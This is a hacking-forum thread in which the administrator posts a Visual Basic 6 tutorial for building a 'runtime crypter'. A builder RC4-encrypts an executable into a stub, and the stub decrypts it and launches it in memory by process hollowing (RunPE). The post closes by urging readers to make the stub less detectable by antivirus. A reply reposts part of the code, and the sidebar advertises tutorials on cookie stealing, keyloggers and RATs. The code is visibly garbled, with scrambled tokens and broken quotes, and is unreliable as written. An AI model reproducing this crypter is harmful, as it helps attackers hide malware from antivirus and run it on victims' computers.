| | █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█ | |
| | Author | Message |
---|
Administrator
Join date : 2011-04-16 Posts : 75 Points : 8919 Reputation : 5010 Gender : Browser :
| Subject: █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█ Sat Nov 19, 2011 3:50 am | |
| Well, in this tutorial I will explain how to make your own Crypter Runtime (Runtime). The crypter not FUD, but that's not my point here. Just want to show what a crypter runtime. Well, if you are not familiar with Visual Basic 6, however, read some basic guidance on how to use it, so do not face any problems following this tutorial. So let's get it started, for this Crypter runtime we need to do two projects, the first project is crypter, and the second project will be the stub.[/color]
1. The Crypter:Open a new project, and we will put several components. We need a textbox, two command buttons and a common dialog. And put the following in their properties.Text1, Text = box which is the file path to encrypt Command1; Caption = Button that calls the file to encrypt Command2; Caption = Button to encrypt CommonDialog1; paste it anywhere in the form PS: If you can not find the CommonDialog, make sure you have added to the components.
[You must be registered and logged in to see this image.] And, the form would look like.
[You must be registered and logged in to see this image.] Now double-click Command1, and add these commands.
- Code:
-
With CommonDialog1 . DialogTitle = "Select The file you Want to Protect" . Filter = "exe Files | *. exe" . ShowOpen End With
If Not CommonDialog1.FileName = vbNullString Then
Text1.Text = CommonDialog1.FileName
End If
Double click Next Command2 and add these commands. - Code:
-
As String Dim Stub
Open App.Path & "\ Stub.exe 'For As # 1 Binary Stub = Space (LOF (1)) Get # 1,, Stub Close # 1
With CommonDialog1
. DialogTitle = "Select Where You Want to Save Crypted File" . Filter = "EXE Files | *. exe" . ShowSave
End With
Dim File As String
Open Text1.Text For Binary As # 1 File = Space (LOF (1)) Get # 1, File Close # 1
File = RC4 (File, "therefenge)
CommonDialog1.FileName Open For Binary As # 1 Put # 1, Stub & "[Theref]" & File Close # 1
MsgBox "Crypted Successfully", vbInformation
Ok, then you will see codes Command2 Command1 and now we have to RC4 function somewhere, copy this code below Command1 or Command2.
- Code:
-
Public Function RC4 (ByVal Data As String, ByVal Password As String) As String 'This is a Modified Function RC4 ^ ^ On Error Resume Next Dim F (0 To 255) As Integer, X, Y As Long, Key () As Byte Key () = StrConv (Password, vbFromUnicode) For X = 0 To 255 Y = (Y + F (X) + Key (X Mod Len (Password))) Mod 256 F (X) = X X Next Key () = StrConv (Data, vbFromUnicode) For X = 0 To Len (Data) Y = (Y + F (AND) + 1) Mod 256 Key (X) = Key (X) XOR F (Temp + F ((Y + F (Y)) Mod 254)) X Next RC4 = StrConv (Key, vbUnicode) End Function ******* Well, we finished the client.******* ******* Now we have to make the Stub.******* 2. Stub:Ok, open a new project. And eliminate the form1 and you do not need any kind in our crypter. And add 2 modules in it. The first module will be the main The second module is the module RunPE And will look like.
[You must be registered and logged in to see this image.] Now, double-click the second module, and put in the form RunPE the following code. - Code:
-
Option Explicit
CONTEXT_FULL As Long Private Const = & H10007 Private Const MAX_PATH As Integer = 260 CREATE_SUSPENDED As Long Private Const = & H4 MEM_COMMIT As Long Private Const = & H1000 MEM_RESERVE As Long Private Const = & H2000 PAGE_EXECUTE_READWRITE As Long Private Const = & H40
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugString" (ByVal lpOutputString As String) As Long
Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long) Private Declare Function CallWindowProc Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
Type Private SECURITY_ATTRIBUTES nLength As Long As Long lpSecurityDescriptor As Long bInheritHandle End Type
Type Private STARTUPINFO cb As Long As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute dwFlags As Long wShowWindow As Integer cbReserved2 As Integer As Long lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError End Type
Type Private PROCESS_INFORMATION hProcess As Long hThread As Long As Long dwProcessId As Long dwThreadId End Type
Type Private FLOATING_SAVE_AREA As Long ControlWord As Long StatusWord As Long TagWord As Long ErrorOffset As Long ErrorSelector As Long DataOffset As Long DataSelector RegisterArea (1 To 80) As Byte As Long Cr0NpxState End Type
Type Private CONTEXT As Long ContextFlags
As Long DR0 Dr1 As Long Dr2 As Long As Long dr3 As Long DR6 As Long DR7
As FloatSave FLOATING_SAVE_AREA As Long SegGs As Long SegFs As Long SEGESA As Long SegDs Edi As Long Esi As Long As Long ebx As Long edx As Long ecx As Long eax As Long ebp As Long eip As Long SegCs As Long EFLAGS As Long GMT As Long SegSs End Type
Type Private IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res (0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2 (0 To 9) As Integer As Long e_lfanew Type End
Type Private IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer As Long TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols SizeOfOptionalHeader As Integer características As Integer End Type
Type Private IMAGE_DATA_DIRECTORY As Long VirtualAddress Size As Long End Type
Type Private IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte As Long SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData 'NT Additional fields. ImageBase As Long As Long SectionAlignment As Long FileAlignment MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer As Long W32VersionValue As Long SizeOfImage As Long SizeOfHeaders CheckSum As Long SubSystem As Integer DllCharacteristics As Integer As Long SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes DataDirectory (0 To 15) As IMAGE_DATA_DIRECTORY End Type
Type Private IMAGE_NT_HEADERS Signature As Long As FileHeader IMAGE_FILE_HEADER As OptionalHeader IMAGE_OPTIONAL_HEADER End Type
Type Private IMAGE_SECTION_HEADER SecName As String * 8 As Long VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers NumberOfRelocations As Integer NumberOfLinenumbers As Integer As Long características End Type
CallAPI Private Function (ByVal slib As String, ByVal smod As String, ParamArray Params ()) As Long As Long Dim LPTR Dim bvASM (& HEC00 & - 1) As Byte Dim i As Long As Long Dim LMOD
LMOD = GetProcAddress (LoadLibraryA (SLIB), smod) If LMOD = 0 Then Exit Function
LPTR = VarPtr (bvASM (0)) ByVal RtlMoveMemory LPTR, & H59595958, & H4: LPTR = LPTR + 4 ByVal RtlMoveMemory LPTR, & H5059, & H2: LPTR LPTR + 2 = For i = UBound (Params) To 0 Step -1 ByVal RtlMoveMemory LPTR, & H68, & H1: LPTR LPTR + 1 = ByVal RtlMoveMemory LPTR, CLng (Params (i)), & H4: LPTR LPTR + 4 = Next ByVal RtlMoveMemory LPTR, & HE8, & H1: LPTR LPTR + 1 = ByVal RtlMoveMemory LPTR, LMOD - LPTR - 4, & H4: LPTR LPTR + 4 = ByVal RtlMoveMemory LPTR, & HC3, & H1: LPTR LPTR + 1 = CallAPI = CallWindowProc (VarPtr (bvASM (0)), 0, 0, 0, 0), End Function
Injec Sub (ByVal sHost As String, ByRef bvBuff () As Byte, Parameter As String) Dim i As Long IHDP Dim As IMAGE_DOS_HEADER Dim As IMAGE_NT_HEADERS Pinho Pish Dim As IMAGE_SECTION_HEADER If Dim As STARTUPINFO Dim Pi As PROCESS_INFORMATION Ctx Dim As CONTEXT
Si.cb = Len (Si)
IHDP RtlMoveMemory, bvBuff (0), 64 RtlMoveMemory Pinho, bvBuff (Pidh.e_lfanew), 248
CreateProcessA sHost, "" & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi CallAPI "ntdll", "NtUnmapViewOfSection" Pi.hProcess, Pinh.OptionalHeader.ImageBase CallAPI "kernel32" "VirtualAllocEx" Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT MEM_RESERVE Or, PAGE_EXECUTE_READWRITE WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase, bvBuff (0), Pinh.OptionalHeader.SizeOfHeaders, 0
For i = 0 To Pinh.FileHeader.NumberOfSections - 1 Pish RtlMoveMemory, bvBuff (Pidh.e_lfanew + 248 + 40 * i), Len (Pish) WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, bvBuff (Pish.PointerToRawData) Pish.SizeOfRawData, 0 Next i
Ctx.ContextFlags = CONTEXT_FULL CallAPI "kernel32", "GetThreadContext" Pi.hThread, VarPtr (Ctx) WriteProcessMemory Pi.hProcess, ByVal Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0 Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint CallAPI "kernel32", "SetThreadContext" Pi.hThread, VarPtr (Ctx) CallAPI "kernel32", "ResumeThread" Pi.hThread Sub End
StrToBytArray Public Function (ByVal SSTR As String) As Byte () Dim i As Long Dim Buffer () As Byte ReDim Buffer (Len (SSTR) - 1) For i = 1 To Len (SSTR) Buffer (i - 1) = Asc (Mid (SSTR, i, 1)) Next i StrToBytArray = Buffer End Function
ThisExe Public Function () As String As Long Dim LRET Dim bvBuff (255) As Byte CallAPI LRET = ("kernel32", "GetModuleFileNameA" App.hInstance, VarPtr (bvBuff (0)), 256) ThisExe $ = Left (StrConv (bvBuff, vbUnicode) LRET) End Function Put these codes in the first module. - Code:
-
Sub Main ()
As String Dim SHIT
SHIT = App.Path & "\" & App.EXEName & ". Exe"
Dim Data As String
SHIT Open For Binary As # 1
Data = Space (LOF (1)) Get # 1,, Data Close # 1
Dim Delimiter () As String
Delimiter () = Split (Data, "[Theref]")
Delimiter (1) = RC4 (Delimiter (1), "therefenge)
Injec Call (SHIT, StrConv (Delimiter (1), vbFromUnicode), vbNullString),
End Sub
Public Function RC4 (ByVal Data As String, ByVal Password As String) As String 'This is a Modified Function RC4 ^ ^ On Error Resume Next Dim F (0 To 255) As Integer, X, Y As Long, Key () As Byte Key () = StrConv (Password, vbFromUnicode) For X = 0 To 255 Y = (Y + F (X) + Key (X Mod Len (Password))) Mod 256 F (X) = X X Next Key () = StrConv (Data, vbFromUnicode) For X = 0 To Len (Data) Y = (Y + F (Y) + 1) Mod 256 Key (X) = Key (X) XOR F (Temp + F ((Y + F (Y)) Mod 254)) X Next RC4 = StrConv (Key, vbUnicode) End Function Note that the "Sub Main ()" is the first thing the Stub will do when it runs. Therefore, it should be the crypter and Stub in the same directory. Now, compile the crypter in Crypter.exe (or Etc.exe), but you have to compile the stub as Stub.exe (Just take out the script that needs crypter "Stub.exe"). Having collected all of them, place them in a folder.
[You must be registered and logged in to see this image.] Woah! You just make your own Crypter Runtime. It's all for now, then the stub is left modear Rump or find a less burnt this to be less detected stub... | |
| | | pum4 Member
Join date : 2012-03-08 Posts : 1 Points : 1 Reputation : 1 Gender : Age : 69 Browser : Location : kns
| Subject: Re: █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█ Fri Mar 09, 2012 12:35 am | |
| button 2 code is bad
As String Dim Stub
Open App.Path & "\ Stub.Exe 'For As # 1 Binary Stub = Space (LOF (1)) Get # 1,, Stub Close # 1
With CommonDialog1
. DialogTitle = "Select Where You Want To Save Crypted File" . Filter = "EXE Files | *. Exe" . ShowSave
End With
Dim File As String
Open Text1.Text For Binary As # 1 File = Space (LOF (1)) Get # 1, File Close # 1
File = RC4 (File, "Therefenge)
CommonDialog1.FileName Open For Binary As # 1 Put # 1, Stub & "[Theref]" & File Close # 1
MsgBox "Crypted Successfully", VbInformation | |
| | | | █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█ | |
|
Similar topics | |
|
| Permissions in this forum: | You cannot reply to topics in this forum
| |
| |
| Latest topics | » 100% freee msgs with zOnG........Thu May 29, 2014 1:02 am by Pelusa» Lock Phone by SmSThu May 29, 2014 12:56 am by Pelusa» Connecting your business to the worldThu May 29, 2014 12:48 am by Pelusa» [TUT]****$How to Hack Facebook Fan Page$****[TUT]Fri Jan 17, 2014 3:41 am by max rockey» [Free] Get a UK virtual phone number [Free] call Forwarding [INSTANT ACTIVE]Sun Nov 17, 2013 6:39 am by arzoo» i Am New HereWed Aug 07, 2013 9:44 am by GuruTrixs» Mobile Anti Virus PerfectFri Jul 26, 2013 3:51 pm by jбk€r» Free fake sms now in pakistanSun Apr 29, 2012 8:03 am by YOUSUF902» Very good ebooks for tips & tricksTue Apr 17, 2012 5:59 am by zaheer321» Remove Windows genuine NotificationFri Mar 30, 2012 4:43 pm by kashifshafique» [TUT] Backtrack Java Applet Attack OUTSIDE NETWORK [TUT]Mon Mar 19, 2012 4:57 am by 23tg94» █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█Fri Mar 09, 2012 12:35 am by pum4» Online Bill (WAPDA)Mon Feb 27, 2012 3:35 am by waqarahmad» [TUT] How to setup Spy-Net 2.6 RAT + No-IP + Portforward [N00B FRIENDLY 100% [NEW]Sun Feb 19, 2012 4:15 pm by Nazaaf» [TUT] Find victims IP through facebook [TUT]Tue Feb 14, 2012 6:32 pm by Ac1drain» ★TuT★ Ultimate Java Drive By ★TuT★Sat Feb 11, 2012 8:08 pm by Ac1drain» ★✮★ [TUT] Complete TrueCrypt Tutorial [MUST-SEE][NOOB-PROOF]★✮★Tue Dec 06, 2011 2:53 pm by Capstan» [TuT] How to freez or crash computersTue Dec 06, 2011 2:46 pm by Capstan» {TUT}COOKIE STEALING{TUT}{NOOB FRIENDLY}}Fri Nov 25, 2011 10:24 am by Administrator» [TuT] Spreding keyloggers, Rat The easiest way ever before [ Very Detailed]Wed Nov 23, 2011 9:31 pm by Dangerous Hacker» Get free .in domain and host by Google,Hostgator and ICICISat Nov 19, 2011 6:13 pm by Administrator» [ TuT ] How to change IP address INSTANTLY [ TuT ] [ REAL Easy ] [ Belkin Router ]Sat Nov 19, 2011 3:08 pm by Administrator» **TuT** Server Rooting!!Sat Nov 19, 2011 3:53 am by Administrator» [TuT] Use Cain to get Xbox live IP's [TuT]Sat Nov 19, 2011 3:33 am by Administrator» [TuT] How to Flood Facebook Wallpost/Comment/Message [With Pictures] [Noob Friendly] (Facebook Flooding)Sat Nov 19, 2011 3:22 am by Administrator» [TUT] HOW TO CRACK HASHED PASSWORDS WITH CPU & GPUSat Nov 19, 2011 3:19 am by Administrator» [TuT] How to View Hidden Passwords Without Software.Sat Nov 19, 2011 3:14 am by Administrator» [TUT]How to hack facebook, twitter, Gmail password using Winspy KeyloggerSat Nov 19, 2011 3:07 am by Administrator» [FREE]DataGuard Antikeylogger Ultimate[Get Free Lifetime]Sat Nov 19, 2011 3:03 am by Administrator» How To Get Free Skype Credit Latest November 2011 TricksSat Nov 19, 2011 3:00 am by Administrator |
|